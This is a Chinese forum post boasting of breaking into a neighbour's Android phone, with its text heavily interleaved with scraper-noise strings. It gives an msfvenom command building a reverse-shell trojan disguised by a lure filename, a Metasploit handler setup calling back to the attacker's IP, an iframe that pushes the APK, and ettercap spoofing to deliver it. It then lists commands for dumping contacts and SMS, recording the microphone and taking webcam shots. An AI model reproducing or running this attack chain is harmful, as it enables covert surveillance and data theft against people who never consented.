metasploit+ettercap中间人攻击成功入侵邻居手机

admin · 发表于 2018-10-20 20:30:37

# J2 s8 E& L1 ~: r; G' z 五、msf+ettercap入侵邻居安卓手机 ) X* b/ x8 G) S3 {! a9 A7 L

0 {' A% U, P- @" p( C% L# g" D 首先启动msf # J2 \, K' s2 \9 {# D! K7 F* p

0 o, k1 ~1 ]& Q5 Q0 k7 M- ?) g' p( X 先用kali生成一个安卓木马，如下命令： _4 n& I, z( d+ o2 f

0 \6 n1 n% I) j9 Y( ?9 t/ u) G4 t Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 6 K$ p6 f$ I1 x% } _, u

7 D* Q0 X( E P( y1 ] 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”，就不适用替换下载的方法了，据我所知，邻居频繁使用手机浏览器浏览新闻 6 j4 o( S& Z, Q5 A( A0 }3 v" s- T

) c8 x' T7 }6 c" I' g 然后进入msf " u9 s4 k- ]* t- C* D4 b' V" o

5 P: u) k3 R5 g+ w5 V# W# O6 ~ use exploit/multi/handler ! ]/ \) S h% X

: D* d) E# K7 z5 j set payload android/meterpreter/reverse_tcp + ~- j' y( ^ W( J/ O

, |2 J8 o5 O P set LHOST 192.168.0.109 //ip为kaili的ip 6 j1 S5 H9 F/ `4 e) {

+ Q6 c$ Q* _9 m" Y4 j, J5 ^ set LPORT 44444 //端口一定要与前面生成的木马的端口一致 - F$ C, }! t3 m) _+ Y

2 A* M0 O+ x& D1 ^/ K1 P3 q; A Exploit " ^" s0 a4 q! n

# l, x: _! V# [+ J 7 ^: s0 y' z( K) r: A% l/ g

6 N3 X+ U0 C! y# |% a 下面我们开启ettercap -G 7 u: K1 D7 x: }2 `- S+ z! K& p/ M9 x% S

l/ K+ w# [' ^: g) r 我物理IP为 8 K% r9 G6 k, B2 q0 y" Q/ ?) ?/ M

" p0 Z, ^7 S) U0 Z! Z* k T; k1 ^$ N, j

$ V3 Q4 U& R" z* l3 S/ y 别到时候再把我物理机欺骗了，之前测试物理机只装腾讯管家是可以成功欺骗的， 0 {1 q0 j: l5 h$ K, L Z% P

5 \4 Q" ?) X0 c 下面我们来设置一下 9 e+ ~5 d$ I y) \9 s# J g; [: B$ R

/ [: H, q# b d, G5 B5 F; y, o # X- O( R+ \ y" g& _

1 C6 Z8 x2 A/ ~' b) @* r 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下，并创建一个index.htm文件内容为：<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载，用iframe语句就OK了， r! U' q8 U; ]4 P

/ q# N$ L! c9 g+ B4 x . G. G! \! G4 [( N

; E# f# X/ r- n, Y8 W ; I, J6 @. @* T% z x% C

# u# |4 I4 Y& ^& Y9 Y0 I! Q 6 \- U: f) h# Q7 L7 z* N# \

' V7 n6 l9 a* r. y8 } / \ ?# l& H4 I$ R. H

! y3 r5 T- Z/ n/ ^ }' v/ D* a 0 y. P: @( A2 d9 @! N; u& L! l

% h x5 Z$ {- w - t' b0 U2 i5 N( r) O- o3 P

+ t1 H8 K4 i! d- e! X$ F& P 7 S4 Y l+ n+ m% A, S

/ B$ l4 {6 K4 |9 O4 M: _4 ^ 5 h0 V; K) u4 R( r

8 Y. B' f7 T9 o( B" F! Q" O# P - S0 g: ~) o3 S# ]* o

9 n2 b8 U ?+ z , v1 ^7 |6 {% R& ~8 N- _

% \5 z$ ?" @: P( _2 n " d& W3 H y4 y# ^( c

& o+ g4 A) l+ a 7 c) W: |6 _# l# c+ V$ Q- Q1 q y

" |& _' z: O" j ' W2 `$ E; y8 U; j2 ~/ Y5 H4 z

) a% [% E% e" y" e z! X 下面我们开始攻击 + N, F( t6 v0 E) }

/ _5 h( _( a. o, [# I' M6 t / f1 ?9 \% C' N1 X! H

% {% j( F8 h. ]) K! w1 i# [+ F 7 s$ _# k; Q w# L1 h& u5 p* O! G

" _' @/ ~, A B( i2 ^$ [0 t 5 u% g7 |% ^0 g8 r6 `" K% [

+ Q* Y$ K9 T) V) r: W4 U$ F( \ % a$ @/ K h$ P0 i5 ?1 ^( |, Q M

8 f) L( l/ j; y( n( V# ]9 } , C8 r, e# ~7 O

% F; u: N' e9 Y0 c) R 大概过了5分钟多，发现反弹成功了 + n7 B0 }3 U: f1 M- L% w# C: w1 u

$ O7 _/ b. M1 ~8 d- B$ v% G' C & @: P! G) w \* q: e; Y

7 Z: n$ b1 I) }! i. j& ? B* ^; }9 P ' q" k6 [% K' N4 v

* r" S2 e/ q- p $ e) q. c9 F) c" r. G

8 K: |" R% Y+ J/ r1 q; x$ P ! @: z2 r, x H! s/ L% \% M

7 K# j# u/ ~) j0 }, L9 X8 T* M8 Y ' \" j. n1 ]7 Q* q* C, s% A

* V) r% S( e7 V5 w/ {, x - F8 l5 o! |- X J; j B

: P- N) B0 x6 G/ k2 Y 3 H4 Y; z t& J1 B. ?$ l8 H

* m1 P; ], u2 _' T 执行命令 : R# K' D9 C% _+ O% {

9 r* h) m* A. X j1 }; ~, C( L % l" Z0 V/ P' q) O" A

& S/ \: i/ _$ u: C dump_contacts --》这个是导出电话 : x0 a' z6 U2 c' _, {8 r

" }6 Q! F/ @* p dump_sms --》这个是导出信息 $ M; H& l m* q. u: p

# c) l* u9 w' h; M h record_mic Record audio from the default microphone for X seconds 2 s- `& |9 d8 T, J

/ y! l7 Z8 {' x" H" C$ ^8 z- P2 B webcam_chat Start a video chat " O1 f& y: \' K) [8 C; J1 I

( N% B( F- C( y, Y U; S webcam_list List webcams 6 m; P; Q: K* r. P- U

. H0 S! h+ t3 k5 A8 E webcam_snap Take a snapshot from the specified webcam * b1 k s6 \3 n; ~

/ p# [- V* I) v$ J+ ?7 j- `4 m# ^ webcam_stream lay a video stream from the specified webcam 5 j' `& w0 z& h& y: L

: P& [- J4 L( `; x1 O' A0 z 8 \2 N1 P7 W6 O* Z; Q. m

& j/ E3 \( ^0 B5 L9 H% T% z9 W 9 ^, u* V; g; V& @3 W% [, G7 X3 J

8 L5 [! X4 h3 K8 s2 u 我们打开看一下电话薄， ! |; Z& C- E# w4 N, q8 o$ U

& I y- F, q2 s+ I* W0 @ ! X0 e4 _1 t& Q2 ^

/ U U* @0 m) F4 J) T4 ?! N/ k $ Q4 H* D2 {, Z

& }; n: {0 ?$ T : g! G% j6 ^1 j1 S' c8 h6 a

- p1 E0 u; ]! E# n, ?" Y# [ . T; a0 p8 u8 Y; |" Z

4 v/ q+ j: l3 X! q# i; \ w, n, { j8 |7 x

6 ~. k D0 Y9 e4 W, v C* C : Z) d0 r* V% ]8 @& T. U

& E, j; s! l& q& b7 n& ^% H2 q 我们同时欺骗成DroidJack木马，使用方法如图： " O8 a8 W7 _3 ?

" j" u4 M6 c% n+ O. X. d" W0 s2 j4 l % N, u* Y; ?, t8 E* J2 ]

) J0 }( ?/ F6 z: s/ m" S # B5 v$ ^* }+ ~2 ]

+ G& M7 D" w+ l8 c0 i/ W* X# }9 g# W % n: J$ Q7 [* F; I

* ?7 H) H3 q% D# G 切记在前面生成完马以后记得在这里选择开关为on，并且对应前面生成马的时候的端口 8 a) k+ }1 H# ?' ?1 q6 `1 ^

& S' Y2 J& n8 J& P$ m # O8 t5 w' V0 F$ n0 g

) O0 ]1 ~9 ? J1 m* F" D , s. L, w# y6 E

6 O9 M5 g, E4 J- G3 J $ Q2 M" g+ u6 @7 X1 t

! X9 X$ |8 {# m' t; j) q% Y# Q% q 9 F/ t, G9 R3 R5 _) e. q7 p

. ^& f9 m- O; Q3 T
6 g+ _& `) c( t! z, X: V2 w4 W

		自动登录	找回密码
密码			立即注册

metasploit+ettercap中间人攻击成功入侵邻居手机

浏览过的版块